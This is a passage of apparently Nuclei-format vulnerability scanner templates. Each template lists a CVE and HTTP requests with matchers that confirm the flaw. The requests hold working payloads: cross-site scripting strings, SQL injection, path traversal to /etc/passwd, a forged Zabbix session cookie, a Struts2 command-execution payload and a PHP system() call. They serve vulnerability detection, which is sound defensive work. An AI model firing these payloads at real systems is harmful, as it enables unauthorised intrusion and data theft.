Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  